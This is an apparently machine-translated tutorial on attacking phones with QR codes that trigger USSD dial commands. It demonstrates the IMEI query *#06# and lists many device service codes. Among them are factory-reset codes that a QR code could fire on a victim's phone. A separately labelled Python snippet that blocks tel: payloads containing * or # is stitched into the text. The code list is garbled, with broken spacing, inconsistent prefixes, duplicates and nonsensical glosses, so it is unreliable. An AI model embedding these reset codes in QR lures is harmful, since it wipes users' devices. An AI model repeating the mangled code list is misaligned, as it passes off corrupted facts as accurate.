QR Code: Malicious USSD Command Attack

Source: Internet
Author: User

The QR code was first used specifically for industrial applications and was later popularized in the advertising industry.

A typical QR code can include:

* Contact information in electronic form;

* Event information: scanning a poster or a QR code in an app can automatically perform a location or download operation;

* Wireless configuration data.

By exploiting human curiosity and the inherent opacity of a QR code (a person cannot read what it encodes), coupled with weaknesses in how mobile platforms handle protocol call services, a QR code can become a medium for malicious attacks on users. This article describes a test that combines a QR code with a USSD command. To keep the reader's mobile phone data safe, the test only shows how to obtain the phone's IMEI code.

USSD (Unstructured Supplementary Service Data) is a new type of interactive data service based on the GSM network. When you enter digits or symbols that the network has defined (for example, * and #) on the phone's keypad and then press the send (dial) key, the phone sends an instruction to the network, which selects the service you need based on that instruction. USSD commands have many functions, including restoring the phone to factory settings and displaying the phone's system software version information.

IMEI is the abbreviation of International Mobile Equipment Identity. It is an electronic serial number consisting of 15 digits that corresponds to a single mobile phone and is unique in the world. Each mobile phone is assigned this globally unique number after it is assembled, and the manufacturer records it from production through delivery.

This test requires a QR code scanner, an Android or iOS mobile phone, and a QR code generator.

Use the online QR code generator at http://goqr.me/. Open the website and select "Callback". In the Telephone Number field, enter *#06# (the USSD command that queries the phone's IMEI). A QR code is automatically generated on the right side.

Scanning this code with a QR code scanner brings up the IMEI information. Some QR code scanners recognize the content as a TEL type and prompt the user before placing the call. This is relatively safe.

Once the QR code is generated, an attacker would naturally try to induce users to scan it through activities on the network to achieve the purpose of the attack. However, it seems that many QR code scanners ask the user again whether to open a link or call a number.
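The confirmation behaviour described above can be tightened on the scanner side by refusing to hand USSD-style dial strings to the dialer at all. The following is an added example, not code from the original article or from any particular scanner; the function names and sample payloads are hypothetical, and it assumes the QR "call" type is delivered as a `tel:` URI.

```python
from urllib.parse import unquote

MMI_CHARS = set("*#")                  # present in USSD/MMI codes, never in a phone number
PHONE_CHARS = set("0123456789+-.() ")  # digits plus common visual separators


def classify_qr_payload(payload: str) -> str:
    """Decide what a scanner should do with decoded QR text.

    Returns 'block', 'confirm-call', 'confirm-open' or 'display-only'.
    """
    scheme, sep, rest = payload.strip().partition(":")
    if not sep:
        return "display-only"          # plain text: show it, never act on it
    scheme = scheme.lower()
    if scheme == "tel":
        # Decode percent-escapes once so %2A / %23 are seen as '*' / '#'.
        decoded = unquote(rest)
        if any(c in MMI_CHARS for c in decoded):
            return "block"             # USSD/MMI code, not a phone number
        number = decoded.split(";", 1)[0]  # drop RFC 3966 parameters such as ;ext=
        if number and all(c in PHONE_CHARS for c in number):
            return "confirm-call"      # ordinary number: still ask the user
        return "block"                 # anything unexpected fails closed
    if scheme in ("http", "https"):
        return "confirm-open"
    return "display-only"


# Constructed sample payloads (not captured from real QR codes).
SAMPLES = [
    "tel:*#06#",             # the IMEI query used in this article's test
    "tel:%2A%2306%23",       # same code, percent-encoded
    "tel:%252306%2523",      # double-encoded: leftover '%' fails closed
    "TEL:+1-555-0100",       # ordinary phone number
    "https://example.com/",  # web link
    "WIFI:S:guest;T:WPA;;",  # wireless configuration data
]


def triage(samples):
    """Map each payload to its verdict, e.g. for a log line or a UI prompt."""
    return {s: classify_qr_payload(s) for s in samples}


if __name__ == "__main__":
    for payload, verdict in triage(SAMPLES).items():
        print(f"{verdict:13} {payload}")
```

A dial string is passed on only when it contains nothing but phone-number characters, so a code hidden behind extra encoding is rejected rather than dialed.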

Some Android devices may not support USSD command attacks. If you dial *#06# and the IMEI code is not displayed, the USSD command is not supported. USSD commands are powerful and can be used to restore factory settings, so a USSD command attack delivered through a QR code is still very harmful. The following is a collection of USSD commands:

Information

* #44336 # Software Version Information
* #1234 # view the software version of PDA, CSC, and MODEM
* #12580*369 # SW & HW Information
* #197328640 # Service Mode
* #06 # = IMEI number.
* #1234 # = firmware version.
* #2222 # = H/W version.
* #8999*8376263 # = all versions.
* #272 * IMEI # * product code
* #3264 # *-memory version
* #92782 # = Mobile Phone Model
* #9999 # * = telephone/PDA/CSC Information

Test

* #07 # test history
* #232339 # WLAN Test Mode
* #232331 # Bluetooth Test Mode
* #232331 # *-Bluetooth Testing
* #0842 # Vibration Motor Test Mode
* #0782 # Real-time clock test
* #0228 # ADC reading
* #32489 # (encrypted information)
* #232337 # Bluetooth address
* #0673 # audio test mode
* #0 * # General Test Mode
* #3214789650 # LBS Test Mode
* #0289 # melody Test Mode
* #0589 # optical sensor test mode
* #0588 # proximity sensor test mode
* #7353 # Quick test menu
* #8999*8378 # = test menu.
* #0588 # *-test proximity sensors
* #2664 # *-touch screen testing
* #0842 # *-vibration test *

Network

* 7465625*638 * # configure the network lock MCC/MNC
#7465625*638 * # Insert the network lock KEYCODE
* 7465625*782 * # new dry method for configuring network lock
#7465625*782 * # Insert the partial network lock key code
* 7465625*77 * # Insert the network lock KEYCODE SP
#7465625*77 * # insert operation Lock key code
* 7465625*27 * # Insert the network Lock key code NSP/CP
#7465625*27 * # Insert the content provider key,
* #7465625 # view the mobile phone lock status
* #232338 # wlan mac address
* #526 # Run the WLAN test in WLAN engineering mode (the same below)
* #528 # WLAN engineering mode
* #2263 # select the RF frequency band. I don't know if this one seems to be locked.
* #301279 # HSDPA/HSUPA menu-change HSDPA class (Optional: 1-5)

Tools/miscellaneous

* #1111 # *-Service Mode

#273283*255*663282 * # create an SD card for Data

* #4777*8665 # = GPSR tool.
* #4238378 # GCF Configuration
* #1575 # GPS control menu

* #9090 # diagnosis configuration
* #7284 # USB I2C mode control installation to USB storage/MODEM
* #872564 # USB Flood Control
* #9900 # log dump that can be used for debugging in the system dump Mode

* #34971539 # camera firmware update
* #7412365 # camera firmware menu

* #273283*255*3282 * # Data creation menu changes SMS, MMS, voice, and contact restrictions
* 2767*4387264636 # sell SMS/PCODE View
* #3282 # * 727336 * Data Usage Status
* #8255 # *-display the great information sources of GTalk Service monitors

* #3214789 # GCF mode status

* #0283 # audio loop control
#7594 # REMAP, shut down, and end the call TSK
* #272886 # automatic response selection

System

Exercise caution

* #7780 # restore factory settings
* 2767*3855 # restore factory settings
* #7780 # * factory data Reset

* #745 # RIL dump menu
* #746 # debug the dump menu
* #9900 # system dump Mode

* #8736364 # OTA update menu
* #2663 # TSP/TSK firmware update
* #03 # S/N of nand flash memory
